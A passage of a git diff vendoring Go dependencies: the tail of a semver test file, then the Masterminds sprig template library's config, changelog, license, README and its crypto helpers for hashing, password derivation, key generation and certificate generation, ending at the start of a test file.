"1.5.1", -1}, + {"2.2.3", "1.5.1", 1}, + {"2.2.3", "2.2.2", 1}, + {"3.2-beta", "3.2-beta", 0}, + {"1.3", "1.1.4", 1}, + {"4.2", "4.2-beta", 1}, + {"4.2-beta", "4.2", -1}, + {"4.2-alpha", "4.2-beta", -1}, + {"4.2-alpha", "4.2-alpha", 0}, + {"4.2-beta.2", "4.2-beta.1", 1}, + {"4.2-beta2", "4.2-beta1", 1}, + {"4.2-beta", "4.2-beta.2", -1}, + {"4.2-beta", "4.2-beta.foo", -1}, + {"4.2-beta.2", "4.2-beta", 1}, + {"4.2-beta.foo", "4.2-beta", 1}, + {"1.2+bar", "1.2+baz", 0}, + } + + for _, tc := range tests { + v1, err := NewVersion(tc.v1) + if err != nil { + t.Errorf("Error parsing version: %s", err) + } + + v2, err := NewVersion(tc.v2) + if err != nil { + t.Errorf("Error parsing version: %s", err) + } + + a := v1.Compare(v2) + e := tc.expected + if a != e { + t.Errorf( + "Comparison of '%s' and '%s' failed. Expected '%d', got '%d'", + tc.v1, tc.v2, e, a, + ) + } + } +} + +func TestLessThan(t *testing.T) { + tests := []struct { + v1 string + v2 string + expected bool + }{ + {"1.2.3", "1.5.1", true}, + {"2.2.3", "1.5.1", false}, + {"3.2-beta", "3.2-beta", false}, + } + + for _, tc := range tests { + v1, err := NewVersion(tc.v1) + if err != nil { + t.Errorf("Error parsing version: %s", err) + } + + v2, err := NewVersion(tc.v2) + if err != nil { + t.Errorf("Error parsing version: %s", err) + } + + a := v1.LessThan(v2) + e := tc.expected + if a != e { + t.Errorf( + "Comparison of '%s' and '%s' failed. Expected '%t', got '%t'", + tc.v1, tc.v2, e, a, + ) + } + } +} + +func TestGreaterThan(t *testing.T) { + tests := []struct { + v1 string + v2 string + expected bool + }{ + {"1.2.3", "1.5.1", false}, + {"2.2.3", "1.5.1", true}, + {"3.2-beta", "3.2-beta", false}, + {"3.2.0-beta.1", "3.2.0-beta.5", false}, + {"3.2-beta.4", "3.2-beta.2", true}, + {"7.43.0-SNAPSHOT.99", "7.43.0-SNAPSHOT.103", false}, + {"7.43.0-SNAPSHOT.FOO", "7.43.0-SNAPSHOT.103", true}, + {"7.43.0-SNAPSHOT.99", "7.43.0-SNAPSHOT.BAR", false}, + } + + for _, tc := range tests { + v1, err := NewVersion(tc.v1) + if err != nil { + t.Errorf("Error parsing version: %s", err) + } + + v2, err := NewVersion(tc.v2) + if err != nil { + t.Errorf("Error parsing version: %s", err) + } + + a := v1.GreaterThan(v2) + e := tc.expected + if a != e { + t.Errorf( + "Comparison of '%s' and '%s' failed. Expected '%t', got '%t'", + tc.v1, tc.v2, e, a, + ) + } + } +} + +func TestEqual(t *testing.T) { + tests := []struct { + v1 string + v2 string + expected bool + }{ + {"1.2.3", "1.5.1", false}, + {"2.2.3", "1.5.1", false}, + {"3.2-beta", "3.2-beta", true}, + {"3.2-beta+foo", "3.2-beta+bar", true}, + } + + for _, tc := range tests { + v1, err := NewVersion(tc.v1) + if err != nil { + t.Errorf("Error parsing version: %s", err) + } + + v2, err := NewVersion(tc.v2) + if err != nil { + t.Errorf("Error parsing version: %s", err) + } + + a := v1.Equal(v2) + e := tc.expected + if a != e { + t.Errorf( + "Comparison of '%s' and '%s' failed. Expected '%t', got '%t'", + tc.v1, tc.v2, e, a, + ) + } + } +} + +func TestInc(t *testing.T) { + tests := []struct { + v1 string + expected string + how string + expectedOriginal string + }{ + {"1.2.3", "1.2.4", "patch", "1.2.4"}, + {"v1.2.4", "1.2.5", "patch", "v1.2.5"}, + {"1.2.3", "1.3.0", "minor", "1.3.0"}, + {"v1.2.4", "1.3.0", "minor", "v1.3.0"}, + {"1.2.3", "2.0.0", "major", "2.0.0"}, + {"v1.2.4", "2.0.0", "major", "v2.0.0"}, + {"1.2.3+meta", "1.2.4", "patch", "1.2.4"}, + {"1.2.3-beta+meta", "1.2.3", "patch", "1.2.3"}, + {"v1.2.4-beta+meta", "1.2.4", "patch", "v1.2.4"}, + {"1.2.3-beta+meta", "1.3.0", "minor", "1.3.0"}, + {"v1.2.4-beta+meta", "1.3.0", "minor", "v1.3.0"}, + {"1.2.3-beta+meta", "2.0.0", "major", "2.0.0"}, + {"v1.2.4-beta+meta", "2.0.0", "major", "v2.0.0"}, + } + + for _, tc := range tests { + v1, err := NewVersion(tc.v1) + if err != nil { + t.Errorf("Error parsing version: %s", err) + } + var v2 Version + switch tc.how { + case "patch": + v2 = v1.IncPatch() + case "minor": + v2 = v1.IncMinor() + case "major": + v2 = v1.IncMajor() + } + + a := v2.String() + e := tc.expected + if a != e { + t.Errorf( + "Inc %q failed. Expected %q got %q", + tc.how, e, a, + ) + } + + a = v2.Original() + e = tc.expectedOriginal + if a != e { + t.Errorf( + "Inc %q failed. Expected original %q got %q", + tc.how, e, a, + ) + } + } +} + +func TestSetPrerelease(t *testing.T) { + tests := []struct { + v1 string + prerelease string + expectedVersion string + expectedPrerelease string + expectedOriginal string + expectedErr error + }{ + {"1.2.3", "**", "1.2.3", "", "1.2.3", ErrInvalidPrerelease}, + {"1.2.3", "beta", "1.2.3-beta", "beta", "1.2.3-beta", nil}, + {"v1.2.4", "beta", "1.2.4-beta", "beta", "v1.2.4-beta", nil}, + } + + for _, tc := range tests { + v1, err := NewVersion(tc.v1) + if err != nil { + t.Errorf("Error parsing version: %s", err) + } + + v2, err := v1.SetPrerelease(tc.prerelease) + if err != tc.expectedErr { + t.Errorf("Expected to get err=%s, but got err=%s", tc.expectedErr, err) + } + + a := v2.Prerelease() + e := tc.expectedPrerelease + if a != e { + t.Errorf("Expected prerelease value=%q, but got %q", e, a) + } + + a = v2.String() + e = tc.expectedVersion + if a != e { + t.Errorf("Expected version string=%q, but got %q", e, a) + } + + a = v2.Original() + e = tc.expectedOriginal + if a != e { + t.Errorf("Expected version original=%q, but got %q", e, a) + } + } +} + +func TestSetMetadata(t *testing.T) { + tests := []struct { + v1 string + metadata string + expectedVersion string + expectedMetadata string + expectedOriginal string + expectedErr error + }{ + {"1.2.3", "**", "1.2.3", "", "1.2.3", ErrInvalidMetadata}, + {"1.2.3", "meta", "1.2.3+meta", "meta", "1.2.3+meta", nil}, + {"v1.2.4", "meta", "1.2.4+meta", "meta", "v1.2.4+meta", nil}, + } + + for _, tc := range tests { + v1, err := NewVersion(tc.v1) + if err != nil { + t.Errorf("Error parsing version: %s", err) + } + + v2, err := v1.SetMetadata(tc.metadata) + if err != tc.expectedErr { + t.Errorf("Expected to get err=%s, but got err=%s", tc.expectedErr, err) + } + + a := v2.Metadata() + e := tc.expectedMetadata + if a != e { + t.Errorf("Expected metadata value=%q, but got %q", e, a) + } + + a = v2.String() + e = tc.expectedVersion + if e != a { + t.Errorf("Expected version string=%q, but got %q", e, a) + } + + a = v2.Original() + e = tc.expectedOriginal + if a != e { + t.Errorf("Expected version original=%q, but got %q", e, a) + } + } +} + +func TestOriginalVPrefix(t *testing.T) { + tests := []struct { + version string + vprefix string + }{ + {"1.2.3", ""}, + {"v1.2.4", "v"}, + } + + for _, tc := range tests { + v1, _ := NewVersion(tc.version) + a := v1.originalVPrefix() + e := tc.vprefix + if a != e { + t.Errorf("Expected vprefix=%q, but got %q", e, a) + } + } +} + +func TestJsonMarshal(t *testing.T) { + sVer := "1.1.1" + x, err := NewVersion(sVer) + if err != nil { + t.Errorf("Error creating version: %s", err) + } + out, err2 := json.Marshal(x) + if err2 != nil { + t.Errorf("Error marshaling version: %s", err2) + } + got := string(out) + want := fmt.Sprintf("%q", sVer) + if got != want { + t.Errorf("Error marshaling unexpected marshaled content: got=%q want=%q", got, want) + } +} + +func TestJsonUnmarshal(t *testing.T) { + sVer := "1.1.1" + ver := &Version{} + err := json.Unmarshal([]byte(fmt.Sprintf("%q", sVer)), ver) + if err != nil { + t.Errorf("Error unmarshaling version: %s", err) + } + got := ver.String() + want := sVer + if got != want { + t.Errorf("Error unmarshaling unexpected object content: got=%q want=%q", got, want) + } +} diff --git a/vendor/github.com/Masterminds/sprig/.gitignore b/vendor/github.com/Masterminds/sprig/.gitignore new file mode 100644 index 0000000000..5e3002f88f --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/.gitignore @@ -0,0 +1,2 @@ +vendor/ +/.glide diff --git a/vendor/github.com/Masterminds/sprig/.travis.yml b/vendor/github.com/Masterminds/sprig/.travis.yml new file mode 100644 index 0000000000..2e7c2d68e3 --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/.travis.yml @@ -0,0 +1,23 @@ +language: go + +go: + - 1.9.x + - 1.10.x + - tip + +# Setting sudo access to false will let Travis CI use containers rather than +# VMs to run the tests. For more details see: +# - http://docs.travis-ci.com/user/workers/container-based-infrastructure/ +# - http://docs.travis-ci.com/user/workers/standard-infrastructure/ +sudo: false + +script: + - make setup test + +notifications: + webhooks: + urls: + - https://webhooks.gitter.im/e/06e3328629952dabe3e0 + on_success: change # options: [always|never|change] default: always + on_failure: always # options: [always|never|change] default: always + on_start: never # options: [always|never|change] default: always diff --git a/vendor/github.com/Masterminds/sprig/CHANGELOG.md b/vendor/github.com/Masterminds/sprig/CHANGELOG.md new file mode 100644 index 0000000000..445937138a --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/CHANGELOG.md @@ -0,0 +1,153 @@ +# Changelog + +## Release 2.15.0 (2018-04-02) + +### Added + +- #68 and #69: Add json helpers to docs (thanks @arunvelsriram) +- #66: Add ternary function (thanks @binoculars) +- #67: Allow keys function to take multiple dicts (thanks @binoculars) +- #89: Added sha1sum to crypto function (thanks @benkeil) +- #81: Allow customizing Root CA that used by genSignedCert (thanks @chenzhiwei) +- #92: Add travis testing for go 1.10 +- #93: Adding appveyor config for windows testing + +### Changed + +- #90: Updating to more recent dependencies +- #73: replace satori/go.uuid with google/uuid (thanks @petterw) + +### Fixed + +- #76: Fixed documentation typos (thanks @Thiht) +- Fixed rounding issue on the `ago` function. Note, the removes support for Go 1.8 and older + +## Release 2.14.1 (2017-12-01) + +### Fixed + +- #60: Fix typo in function name documentation (thanks @neil-ca-moore) +- #61: Removing line with {{ due to blocking github pages genertion +- #64: Update the list functions to handle int, string, and other slices for compatibility + +## Release 2.14.0 (2017-10-06) + +This new version of Sprig adds a set of functions for generating and working with SSL certificates. + +- `genCA` generates an SSL Certificate Authority +- `genSelfSignedCert` generates an SSL self-signed certificate +- `genSignedCert` generates an SSL certificate and key based on a given CA + +## Release 2.13.0 (2017-09-18) + +This release adds new functions, including: + +- `regexMatch`, `regexFindAll`, `regexFind`, `regexReplaceAll`, `regexReplaceAllLiteral`, and `regexSplit` to work with regular expressions +- `floor`, `ceil`, and `round` math functions +- `toDate` converts a string to a date +- `nindent` is just like `indent` but also prepends a new line +- `ago` returns the time from `time.Now` + +### Added + +- #40: Added basic regex functionality (thanks @alanquillin) +- #41: Added ceil floor and round functions (thanks @alanquillin) +- #48: Added toDate function (thanks @andreynering) +- #50: Added nindent function (thanks @binoculars) +- #46: Added ago function (thanks @slayer) + +### Changed + +- #51: Updated godocs to include new string functions (thanks @curtisallen) +- #49: Added ability to merge multiple dicts (thanks @binoculars) + +## Release 2.12.0 (2017-05-17) + +- `snakecase`, `camelcase`, and `shuffle` are three new string functions +- `fail` allows you to bail out of a template render when conditions are not met + +## Release 2.11.0 (2017-05-02) + +- Added `toJson` and `toPrettyJson` +- Added `merge` +- Refactored documentation + +## Release 2.10.0 (2017-03-15) + +- Added `semver` and `semverCompare` for Semantic Versions +- `list` replaces `tuple` +- Fixed issue with `join` +- Added `first`, `last`, `intial`, `rest`, `prepend`, `append`, `toString`, `toStrings`, `sortAlpha`, `reverse`, `coalesce`, `pluck`, `pick`, `compact`, `keys`, `omit`, `uniq`, `has`, `without` + +## Release 2.9.0 (2017-02-23) + +- Added `splitList` to split a list +- Added crypto functions of `genPrivateKey` and `derivePassword` + +## Release 2.8.0 (2016-12-21) + +- Added access to several path functions (`base`, `dir`, `clean`, `ext`, and `abs`) +- Added functions for _mutating_ dictionaries (`set`, `unset`, `hasKey`) + +## Release 2.7.0 (2016-12-01) + +- Added `sha256sum` to generate a hash of an input +- Added functions to convert a numeric or string to `int`, `int64`, `float64` + +## Release 2.6.0 (2016-10-03) + +- Added a `uuidv4` template function for generating UUIDs inside of a template. + +## Release 2.5.0 (2016-08-19) + +- New `trimSuffix`, `trimPrefix`, `hasSuffix`, and `hasPrefix` functions +- New aliases have been added for a few functions that didn't follow the naming conventions (`trimAll` and `abbrevBoth`) +- `trimall` and `abbrevboth` (notice the case) are deprecated and will be removed in 3.0.0 + +## Release 2.4.0 (2016-08-16) + +- Adds two functions: `until` and `untilStep` + +## Release 2.3.0 (2016-06-21) + +- cat: Concatenate strings with whitespace separators. +- replace: Replace parts of a string: `replace " " "-" "Me First"` renders "Me-First" +- plural: Format plurals: `len "foo" | plural "one foo" "many foos"` renders "many foos" +- indent: Indent blocks of text in a way that is sensitive to "\n" characters. + +## Release 2.2.0 (2016-04-21) + +- Added a `genPrivateKey` function (Thanks @bacongobbler) + +## Release 2.1.0 (2016-03-30) + +- `default` now prints the default value when it does not receive a value down the pipeline. It is much safer now to do `{{.Foo | default "bar"}}`. +- Added accessors for "hermetic" functions. These return only functions that, when given the same input, produce the same output. + +## Release 2.0.0 (2016-03-29) + +Because we switched from `int` to `int64` as the return value for all integer math functions, the library's major version number has been incremented. + +- `min` complements `max` (formerly `biggest`) +- `empty` indicates that a value is the empty value for its type +- `tuple` creates a tuple inside of a template: `{{$t := tuple "a", "b" "c"}}` +- `dict` creates a dictionary inside of a template `{{$d := dict "key1" "val1" "key2" "val2"}}` +- Date formatters have been added for HTML dates (as used in `date` input fields) +- Integer math functions can convert from a number of types, including `string` (via `strconv.ParseInt`). + +## Release 1.2.0 (2016-02-01) + +- Added quote and squote +- Added b32enc and b32dec +- add now takes varargs +- biggest now takes varargs + +## Release 1.1.0 (2015-12-29) + +- Added #4: Added contains function. strings.Contains, but with the arguments + switched to simplify common pipelines. (thanks krancour) +- Added Travis-CI testing support + +## Release 1.0.0 (2015-12-23) + +- Initial release diff --git a/vendor/github.com/Masterminds/sprig/LICENSE.txt b/vendor/github.com/Masterminds/sprig/LICENSE.txt new file mode 100644 index 0000000000..5c95accc2e --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/LICENSE.txt @@ -0,0 +1,20 @@ +Sprig +Copyright (C) 2013 Masterminds + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in +all copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN +THE SOFTWARE. diff --git a/vendor/github.com/Masterminds/sprig/Makefile b/vendor/github.com/Masterminds/sprig/Makefile new file mode 100644 index 0000000000..63a93fdf79 --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/Makefile @@ -0,0 +1,13 @@ + +HAS_GLIDE := $(shell command -v glide;) + +.PHONY: test +test: + go test -v . + +.PHONY: setup +setup: +ifndef HAS_GLIDE + go get -u github.com/Masterminds/glide +endif + glide install diff --git a/vendor/github.com/Masterminds/sprig/README.md b/vendor/github.com/Masterminds/sprig/README.md new file mode 100644 index 0000000000..25bf3d4f4b --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/README.md @@ -0,0 +1,81 @@ +# Sprig: Template functions for Go templates +[![Stability: Sustained](https://masterminds.github.io/stability/sustained.svg)](https://masterminds.github.io/stability/sustained.html) +[![Build Status](https://travis-ci.org/Masterminds/sprig.svg?branch=master)](https://travis-ci.org/Masterminds/sprig) + +The Go language comes with a [built-in template +language](http://golang.org/pkg/text/template/), but not +very many template functions. This library provides a group of commonly +used template functions. + +It is inspired by the template functions found in +[Twig](http://twig.sensiolabs.org/documentation) and also in various +JavaScript libraries, such as [underscore.js](http://underscorejs.org/). + +## Usage + +Template developers can read the [Sprig function documentation](http://masterminds.github.io/sprig/) to +learn about the >100 template functions available. + +For Go developers wishing to include Sprig as a library in their programs, +API documentation is available [at GoDoc.org](http://godoc.org/github.com/Masterminds/sprig), but +read on for standard usage. + +### Load the Sprig library + +To load the Sprig `FuncMap`: + +```go + +import ( + "github.com/Masterminds/sprig" + "html/template" +) + +// This example illustrates that the FuncMap *must* be set before the +// templates themselves are loaded. +tpl := template.Must( + template.New("base").Funcs(sprig.FuncMap()).ParseGlob("*.html") +) + + +``` + +### Call the functions inside of templates + +By convention, all functions are lowercase. This seems to follow the Go +idiom for template functions (as opposed to template methods, which are +TitleCase). + + +Example: + +``` +{{ "hello!" | upper | repeat 5 }} +``` + +Produces: + +``` +HELLO!HELLO!HELLO!HELLO!HELLO! +``` + +## Principles: + +The following principles were used in deciding on which functions to add, and +determining how to implement them. + +- Template functions should be used to build layout. Therefore, the following + types of operations are within the domain of template functions: + - Formatting + - Layout + - Simple type conversions + - Utilities that assist in handling common formatting and layout needs (e.g. arithmetic) +- Template functions should not return errors unless there is no way to print + a sensible value. For example, converting a string to an integer should not + produce an error if conversion fails. Instead, it should display a default + value that can be displayed. +- Simple math is necessary for grid layouts, pagers, and so on. Complex math + (anything other than arithmetic) should be done outside of templates. +- Template functions only deal with the data passed into them. They never retrieve + data from a source. +- Finally, do not override core Go template functions. diff --git a/vendor/github.com/Masterminds/sprig/appveyor.yml b/vendor/github.com/Masterminds/sprig/appveyor.yml new file mode 100644 index 0000000000..d545a987a3 --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/appveyor.yml @@ -0,0 +1,26 @@ + +version: build-{build}.{branch} + +clone_folder: C:\gopath\src\github.com\Masterminds\sprig +shallow_clone: true + +environment: + GOPATH: C:\gopath + +platform: + - x64 + +install: + - go get -u github.com/Masterminds/glide + - set PATH=%GOPATH%\bin;%PATH% + - go version + - go env + +build_script: + - glide install + - go install ./... + +test_script: + - go test -v + +deploy: off diff --git a/vendor/github.com/Masterminds/sprig/crypto.go b/vendor/github.com/Masterminds/sprig/crypto.go new file mode 100644 index 0000000000..a91c4a7045 --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/crypto.go @@ -0,0 +1,430 @@ +package sprig + +import ( + "bytes" + "crypto/dsa" + "crypto/ecdsa" + "crypto/elliptic" + "crypto/hmac" + "crypto/rand" + "crypto/rsa" + "crypto/sha1" + "crypto/sha256" + "crypto/x509" + "crypto/x509/pkix" + "encoding/asn1" + "encoding/base64" + "encoding/binary" + "encoding/hex" + "encoding/pem" + "errors" + "fmt" + "math/big" + "net" + "time" + + "github.com/google/uuid" + "golang.org/x/crypto/scrypt" +) + +func sha256sum(input string) string { + hash := sha256.Sum256([]byte(input)) + return hex.EncodeToString(hash[:]) +} + +func sha1sum(input string) string { + hash := sha1.Sum([]byte(input)) + return hex.EncodeToString(hash[:]) +} + +// uuidv4 provides a safe and secure UUID v4 implementation +func uuidv4() string { + return fmt.Sprintf("%s", uuid.New()) +} + +var master_password_seed = "com.lyndir.masterpassword" + +var password_type_templates = map[string][][]byte{ + "maximum": {[]byte("anoxxxxxxxxxxxxxxxxx"), []byte("axxxxxxxxxxxxxxxxxno")}, + "long": {[]byte("CvcvnoCvcvCvcv"), []byte("CvcvCvcvnoCvcv"), []byte("CvcvCvcvCvcvno"), []byte("CvccnoCvcvCvcv"), []byte("CvccCvcvnoCvcv"), + []byte("CvccCvcvCvcvno"), []byte("CvcvnoCvccCvcv"), []byte("CvcvCvccnoCvcv"), []byte("CvcvCvccCvcvno"), []byte("CvcvnoCvcvCvcc"), + []byte("CvcvCvcvnoCvcc"), []byte("CvcvCvcvCvccno"), []byte("CvccnoCvccCvcv"), []byte("CvccCvccnoCvcv"), []byte("CvccCvccCvcvno"), + []byte("CvcvnoCvccCvcc"), []byte("CvcvCvccnoCvcc"), []byte("CvcvCvccCvccno"), []byte("CvccnoCvcvCvcc"), []byte("CvccCvcvnoCvcc"), + []byte("CvccCvcvCvccno")}, + "medium": {[]byte("CvcnoCvc"), []byte("CvcCvcno")}, + "short": {[]byte("Cvcn")}, + "basic": {[]byte("aaanaaan"), []byte("aannaaan"), []byte("aaannaaa")}, + "pin": {[]byte("nnnn")}, +} + +var template_characters = map[byte]string{ + 'V': "AEIOU", + 'C': "BCDFGHJKLMNPQRSTVWXYZ", + 'v': "aeiou", + 'c': "bcdfghjklmnpqrstvwxyz", + 'A': "AEIOUBCDFGHJKLMNPQRSTVWXYZ", + 'a': "AEIOUaeiouBCDFGHJKLMNPQRSTVWXYZbcdfghjklmnpqrstvwxyz", + 'n': "0123456789", + 'o': "@&%?,=[]_:-+*$#!'^~;()/.", + 'x': "AEIOUaeiouBCDFGHJKLMNPQRSTVWXYZbcdfghjklmnpqrstvwxyz0123456789!@#$%^&*()", +} + +func derivePassword(counter uint32, password_type, password, user, site string) string { + var templates = password_type_templates[password_type] + if templates == nil { + return fmt.Sprintf("cannot find password template %s", password_type) + } + + var buffer bytes.Buffer + buffer.WriteString(master_password_seed) + binary.Write(&buffer, binary.BigEndian, uint32(len(user))) + buffer.WriteString(user) + + salt := buffer.Bytes() + key, err := scrypt.Key([]byte(password), salt, 32768, 8, 2, 64) + if err != nil { + return fmt.Sprintf("failed to derive password: %s", err) + } + + buffer.Truncate(len(master_password_seed)) + binary.Write(&buffer, binary.BigEndian, uint32(len(site))) + buffer.WriteString(site) + binary.Write(&buffer, binary.BigEndian, counter) + + var hmacv = hmac.New(sha256.New, key) + hmacv.Write(buffer.Bytes()) + var seed = hmacv.Sum(nil) + var temp = templates[int(seed[0])%len(templates)] + + buffer.Truncate(0) + for i, element := range temp { + pass_chars := template_characters[element] + pass_char := pass_chars[int(seed[i+1])%len(pass_chars)] + buffer.WriteByte(pass_char) + } + + return buffer.String() +} + +func generatePrivateKey(typ string) string { + var priv interface{} + var err error + switch typ { + case "", "rsa": + // good enough for government work + priv, err = rsa.GenerateKey(rand.Reader, 4096) + case "dsa": + key := new(dsa.PrivateKey) + // again, good enough for government work + if err = dsa.GenerateParameters(&key.Parameters, rand.Reader, dsa.L2048N256); err != nil { + return fmt.Sprintf("failed to generate dsa params: %s", err) + } + err = dsa.GenerateKey(key, rand.Reader) + priv = key + case "ecdsa": + // again, good enough for government work + priv, err = ecdsa.GenerateKey(elliptic.P256(), rand.Reader) + default: + return "Unknown type " + typ + } + if err != nil { + return fmt.Sprintf("failed to generate private key: %s", err) + } + + return string(pem.EncodeToMemory(pemBlockForKey(priv))) +} + +type DSAKeyFormat struct { + Version int + P, Q, G, Y, X *big.Int +} + +func pemBlockForKey(priv interface{}) *pem.Block { + switch k := priv.(type) { + case *rsa.PrivateKey: + return &pem.Block{Type: "RSA PRIVATE KEY", Bytes: x509.MarshalPKCS1PrivateKey(k)} + case *dsa.PrivateKey: + val := DSAKeyFormat{ + P: k.P, Q: k.Q, G: k.G, + Y: k.Y, X: k.X, + } + bytes, _ := asn1.Marshal(val) + return &pem.Block{Type: "DSA PRIVATE KEY", Bytes: bytes} + case *ecdsa.PrivateKey: + b, _ := x509.MarshalECPrivateKey(k) + return &pem.Block{Type: "EC PRIVATE KEY", Bytes: b} + default: + return nil + } +} + +type certificate struct { + Cert string + Key string +} + +func buildCustomCertificate(b64cert string, b64key string) (certificate, error) { + crt := certificate{} + + cert, err := base64.StdEncoding.DecodeString(b64cert) + if err != nil { + return crt, errors.New("unable to decode base64 certificate") + } + + key, err := base64.StdEncoding.DecodeString(b64key) + if err != nil { + return crt, errors.New("unable to decode base64 private key") + } + + decodedCert, _ := pem.Decode(cert) + if decodedCert == nil { + return crt, errors.New("unable to decode certificate") + } + _, err = x509.ParseCertificate(decodedCert.Bytes) + if err != nil { + return crt, fmt.Errorf( + "error parsing certificate: decodedCert.Bytes: %s", + err, + ) + } + + decodedKey, _ := pem.Decode(key) + if decodedKey == nil { + return crt, errors.New("unable to decode key") + } + _, err = x509.ParsePKCS1PrivateKey(decodedKey.Bytes) + if err != nil { + return crt, fmt.Errorf( + "error parsing prive key: decodedKey.Bytes: %s", + err, + ) + } + + crt.Cert = string(cert) + crt.Key = string(key) + + return crt, nil +} + +func generateCertificateAuthority( + cn string, + daysValid int, +) (certificate, error) { + ca := certificate{} + + template, err := getBaseCertTemplate(cn, nil, nil, daysValid) + if err != nil { + return ca, err + } + // Override KeyUsage and IsCA + template.KeyUsage = x509.KeyUsageKeyEncipherment | + x509.KeyUsageDigitalSignature | + x509.KeyUsageCertSign + template.IsCA = true + + priv, err := rsa.GenerateKey(rand.Reader, 2048) + if err != nil { + return ca, fmt.Errorf("error generating rsa key: %s", err) + } + + ca.Cert, ca.Key, err = getCertAndKey(template, priv, template, priv) + if err != nil { + return ca, err + } + + return ca, nil +} + +func generateSelfSignedCertificate( + cn string, + ips []interface{}, + alternateDNS []interface{}, + daysValid int, +) (certificate, error) { + cert := certificate{} + + template, err := getBaseCertTemplate(cn, ips, alternateDNS, daysValid) + if err != nil { + return cert, err + } + + priv, err := rsa.GenerateKey(rand.Reader, 2048) + if err != nil { + return cert, fmt.Errorf("error generating rsa key: %s", err) + } + + cert.Cert, cert.Key, err = getCertAndKey(template, priv, template, priv) + if err != nil { + return cert, err + } + + return cert, nil +} + +func generateSignedCertificate( + cn string, + ips []interface{}, + alternateDNS []interface{}, + daysValid int, + ca certificate, +) (certificate, error) { + cert := certificate{} + + decodedSignerCert, _ := pem.Decode([]byte(ca.Cert)) + if decodedSignerCert == nil { + return cert, errors.New("unable to decode certificate") + } + signerCert, err := x509.ParseCertificate(decodedSignerCert.Bytes) + if err != nil { + return cert, fmt.Errorf( + "error parsing certificate: decodedSignerCert.Bytes: %s", + err, + ) + } + decodedSignerKey, _ := pem.Decode([]byte(ca.Key)) + if decodedSignerKey == nil { + return cert, errors.New("unable to decode key") + } + signerKey, err := x509.ParsePKCS1PrivateKey(decodedSignerKey.Bytes) + if err != nil { + return cert, fmt.Errorf( + "error parsing prive key: decodedSignerKey.Bytes: %s", + err, + ) + } + + template, err := getBaseCertTemplate(cn, ips, alternateDNS, daysValid) + if err != nil { + return cert, err + } + + priv, err := rsa.GenerateKey(rand.Reader, 2048) + if err != nil { + return cert, fmt.Errorf("error generating rsa key: %s", err) + } + + cert.Cert, cert.Key, err = getCertAndKey( + template, + priv, + signerCert, + signerKey, + ) + if err != nil { + return cert, err + } + + return cert, nil +} + +func getCertAndKey( + template *x509.Certificate, + signeeKey *rsa.PrivateKey, + parent *x509.Certificate, + signingKey *rsa.PrivateKey, +) (string, string, error) { + derBytes, err := x509.CreateCertificate( + rand.Reader, + template, + parent, + &signeeKey.PublicKey, + signingKey, + ) + if err != nil { + return "", "", fmt.Errorf("error creating certificate: %s", err) + } + + certBuffer := bytes.Buffer{} + if err := pem.Encode( + &certBuffer, + &pem.Block{Type: "CERTIFICATE", Bytes: derBytes}, + ); err != nil { + return "", "", fmt.Errorf("error pem-encoding certificate: %s", err) + } + + keyBuffer := bytes.Buffer{} + if err := pem.Encode( + &keyBuffer, + &pem.Block{ + Type: "RSA PRIVATE KEY", + Bytes: x509.MarshalPKCS1PrivateKey(signeeKey), + }, + ); err != nil { + return "", "", fmt.Errorf("error pem-encoding key: %s", err) + } + + return string(certBuffer.Bytes()), string(keyBuffer.Bytes()), nil +} + +func getBaseCertTemplate( + cn string, + ips []interface{}, + alternateDNS []interface{}, + daysValid int, +) (*x509.Certificate, error) { + ipAddresses, err := getNetIPs(ips) + if err != nil { + return nil, err + } + dnsNames, err := getAlternateDNSStrs(alternateDNS) + if err != nil { + return nil, err + } + return &x509.Certificate{ + SerialNumber: big.NewInt(1), + Subject: pkix.Name{ + CommonName: cn, + }, + IPAddresses: ipAddresses, + DNSNames: dnsNames, + NotBefore: time.Now(), + NotAfter: time.Now().Add(time.Hour * 24 * time.Duration(daysValid)), + KeyUsage: x509.KeyUsageKeyEncipherment | x509.KeyUsageDigitalSignature, + ExtKeyUsage: []x509.ExtKeyUsage{ + x509.ExtKeyUsageServerAuth, + x509.ExtKeyUsageClientAuth, + }, + BasicConstraintsValid: true, + }, nil +} + +func getNetIPs(ips []interface{}) ([]net.IP, error) { + if ips == nil { + return []net.IP{}, nil + } + var ipStr string + var ok bool + var netIP net.IP + netIPs := make([]net.IP, len(ips)) + for i, ip := range ips { + ipStr, ok = ip.(string) + if !ok { + return nil, fmt.Errorf("error parsing ip: %v is not a string", ip) + } + netIP = net.ParseIP(ipStr) + if netIP == nil { + return nil, fmt.Errorf("error parsing ip: %s", ipStr) + } + netIPs[i] = netIP + } + return netIPs, nil +} + +func getAlternateDNSStrs(alternateDNS []interface{}) ([]string, error) { + if alternateDNS == nil { + return []string{}, nil + } + var dnsStr string + var ok bool + alternateDNSStrs := make([]string, len(alternateDNS)) + for i, dns := range alternateDNS { + dnsStr, ok = dns.(string) + if !ok { + return nil, fmt.Errorf( + "error processing alternate dns name: %v is not a string", + dns, + ) + } + alternateDNSStrs[i] = dnsStr + } + return alternateDNSStrs, nil +} diff --git a/vendor/github.com/Masterminds/sprig/crypto_test.go b/vendor/github.com/Masterminds/sprig/crypto_test.go new file mode 100644 index 0000000000..77b3e3fb2c --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/crypto_test.go @@ -0,0 